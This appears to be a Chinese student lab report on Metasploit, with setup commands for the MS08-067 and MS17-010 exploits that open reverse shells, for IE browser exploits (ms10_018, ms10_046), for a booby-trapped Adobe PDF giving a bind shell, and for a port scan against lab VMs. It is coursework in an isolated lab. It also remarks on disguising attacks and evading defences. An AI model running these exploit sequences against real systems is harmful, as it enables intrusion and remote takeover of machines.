zoukankan      html  css  js  c++  java
  • 2019-2020-2 20174310隋润起《网络对抗技术》Exp6 MSF基础应用

    一、实践内容

       本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

      1.1一个主动攻击实践,如ms08_067

      1.2 一个针对浏览器的攻击,如ms11_050

      1.3 一个针对客户端的攻击,如Adobe

      1.4 成功应用任何一个辅助模块

      以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的

    二、实践过程

    攻击机:

    • Kali:192.168.80.131

    靶机:

    • WinXP:192.168.80.134

    实验前准备:

    检测两个虚拟机能否ping通

    刚开始出现靶机能够ping攻击机,而攻击机不能ping靶机的情况

    在靶机中通过cmd命令关闭防火墙后,二者能够互相ping通

     

    2.1 一个主动攻击实践

    2.1.1 ms08_067漏洞渗透攻击实践

    攻击者试探靶机是否存在ms08_067这个漏洞

    • nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.80.134

     可以看到靶机确实存在这个漏洞

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • use exploit/windows/smb/ms08_067_netapi
    • set payload generic/shell_reverse_tcp //tcp反向回连
    • set LHOST 192.168.80.131 //Kali即攻击方ip
    • set LPORT 4310 //端口
    • set RHOST 192.168.80.134 //xp靶机ip(漏洞端口已经固定)
    • exploit //攻击

    可以看到回连成功

     通过一些cmd指令,搜寻靶机的信息

     

    2.1.2MS17_010漏洞渗透攻击实践

    使用指令

    • nmap --script=vuln 192.168.80.134

    看看靶机是否还有其他的漏洞可以实践。

     发现还存在MS17_010这个漏洞

    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    • use exploit/windows/smb/ms17_010_eternalblue
    • set payload generic/shell_reverse_tcp //tcp反向回连
    • set LHOST 192.168.80.131 //Kali即攻击方ip
    • set LPORT 4310 //端口
    • set RHOST 192.168.80.134 //xp靶机ip(漏洞端口已经固定)
    • exploit //攻击

     发现回连失败

    用show targets命令发现这个漏洞只有win7能够使用

     打开win7虚拟机,ipconfig观察IP地址

     更改靶机ip地址为192.168.80.131,再次攻击(注意将靶机防火墙关闭)

     回连成功

    并查看IP信息 

    2.2针对浏览器的攻击

    2.2.1ms10_018漏洞攻击

    首先查看浏览器漏洞:

    • cd /usr/share/metasploit-framework/modules/exploits/windows/browser

    输入 ls 即可看到很多漏洞代码,选择

    • ms10_018_ie_behaviors.rb

     进入msf,输入

    • search ms10_018

    寻找相关漏洞模块

     

    依次输入以下指令:

    • use exploit/windows/browser/ms10_018_ie_behaviors 
    • set payload windows/meterpreter/reverse_tcp 
    • set LHOST 192.168.80.131 //Kali即攻击方ip
    • set SRVHOST 192.168.80.131 //设置服务器IP(攻击者IP)
    • exploit //攻击

     

     在靶机访问对应网址

     查看会话,使用指令

    • sessions

    选择会话

    • sessions 2

    并获得靶机的控制权,查看靶机ip信息

     

     命令并不能识别,换一个漏洞 ms10_046再次尝试,过程与上面类似

     

     生成成功,再次访问

     再次通过session1进行攻击

     这次成功了

    2.3 针对客户端的攻击——Adobe攻击

    启动msf 输入search adobe查询针对adobe攻击模块

     

    使用

    • use windows/fileformat/adobe_cooltype_sing

    设置payloads

    依次输入下列指令

    • set payload windows/meterpreter/bind_tcp
    • set RHOST 192.168.80.134 //靶机ip
    • set LPORT 4310 //攻击端口
    • exploit//生成pdf

     

     生成pdf成功,cp复制到根目录

    复制到靶机并在靶机钟打开PDF。

    在msf中,用如下指令进行监听

    • use exploit/multi/handler //进入监听模块
    • set payload windows/meterpreter/bind_tcp //选择攻击载荷
    • set RHOST 192.168.80.134//靶机IP
    • set LPORT 4310 //攻击端口
    • exploit

    获得权限,使用ipconfig指令进行验证

     成功

    3.4成功应用任何一个辅助模块

    3.4.1scanner/portscan/tcp(唯一)

    进入msf输入【show auxiliary】指令,查看可用的辅助模块。

    选择了

    • scanner/portscan/tcp

    模块,该模块用来探测靶机的开放的tcp端口

    依次输入指令

    • use scanner/portscan/tcp
    • set RHOSTS 192.168.80.134
    • exploit

    便得到探测结果

    三、基础问题回答

    4.1用自己的话解释什么是exploit,payload,encode

    • exploit就是漏洞的利用,如何利用漏洞,将我们制造的恶意代码传递过去,起到一个通道的作用。
    • payload就是一段恶意代码,在靶机的漏洞发挥作用,达到我们某种目的的代码,通过通道传输到靶机,发挥作用。
    • encode就是包装,将payload的代码进行改造,变得不那么容易被发现。

    4.2离实战还缺些什么技术或步骤

    • 我们的实验与实际的生活还是有一定的差距,默认的将防火墙关闭,等等多种预设条件下进行的。要想与实战接轨,就要加强对信息的收集能力,在我们的实验中,实际上对靶机是了如指掌,而实战我们对靶机可能是一无所知,要从零开始对信息进行收集。其次我们的一些后门程序和网址,被攻击方方也不会乖乖的进行访问,我们需要对我们的攻击手段进行伪装,让对方在无意识的情况下被攻击,并且能够绕过一些防护软件的防御。

    四、实践总结

    这次实验是对于msf的一些简单应用,对于一些特定的漏洞,通过msf的一些工具在靶机上发挥作用。通过这次实验,我学会如何使用msf,遇到不会的就info查看详情,配置参数就是options查看,这样可以让我自己解决一些问题。同时也要加强英语的学习,这样大大的节省了查询单词的时间

  • 相关阅读:
    C#中两个日期类型的变量如何进行比较
    Ajax基本原理讲解 (引用别人文章)
    Ajax程序设计入门
    ASP.NET中如何调用存储过程
    删除SAM文件真的能够消除XP系统管理员的密码吗?
    用XMLHttpRequest和struts实现AJAX(译)
    关于邮件系统域名(DNS)设置的小常识
    输出各种二进制流的格式
    WPF 3D编程介绍
    WPF 3D学习笔记
  • 原文地址:https://www.cnblogs.com/srq111/p/12811020.html
Copyright © 2011-2022 走看看